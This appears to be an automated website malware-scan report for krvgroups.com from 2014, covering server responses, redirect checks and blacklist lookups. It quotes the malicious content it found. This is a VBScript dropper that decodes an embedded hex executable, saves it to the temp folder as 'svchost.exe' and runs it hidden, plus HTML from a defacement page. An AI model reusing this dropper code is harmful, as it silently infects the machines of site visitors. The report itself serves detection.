Scanned pages/files
Request | Server response | Status |
http://krvgroups.com/ | 200 OK Content-Length: 238258 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = 'svchost.exe' WriteData = '4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000D80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000525B767E163A182D163A182D163A182DD535452D1B3A182D163A192D2E3A182D31FC6A2D173A182D31FC642D173A182D31FC602D173A182D52696368163A182D00000000000000000000000000000000000000000000000050450000 Set FSO = CreateObject('Scripting.FileSystemObject') DropPath = FSO.GetSpecialFolder(2) & '' & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng('&H' & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject('WScript.Shell') WSHshell.Run DropPath, 0 Antivirus reports:
Deface/Content modification. The following signature was found: Hacked By : ...[964 bytes skipped]... cription' content='تم الاختراق من قبل تركي ، هكر'> </head> <body bgcolor='#000000'> <p align='center'><b><font size='4' color='#92815C'>Hacked By : </font> <font color='#FFFFFF'><font size='4'>Turki hkr</font></font></b></p> <p align='center'> </p> <p align='center'> <img border='0' src='http://im40.gulfup.com/MCgE8.jpg' width='333' height='333'></p> <p align='center' style='color: rgb(0, 0, 0); font-family: Times New Roman; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-s ...[240614 bytes skipped]... | ||
http://krvgroups.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: krvgroups.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Aug 2014 21:08:20 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4
Content-Type: text/html
X-Powered-By: PHP/5.4.28
GET / HTTP/1.1
Host: krvgroups.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Aug 2014 21:08:20 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4
Content-Type: text/html
X-Powered-By: PHP/5.4.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: krvgroups.com
Referer: http://www.google.com/search?q=krvgroups.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: krvgroups.com
Referer: http://www.google.com/search?q=krvgroups.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=krvgroups.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://krvgroups.com/
Result: krvgroups.com is not infected or malware details are not published yet.
Result: krvgroups.com is not infected or malware details are not published yet.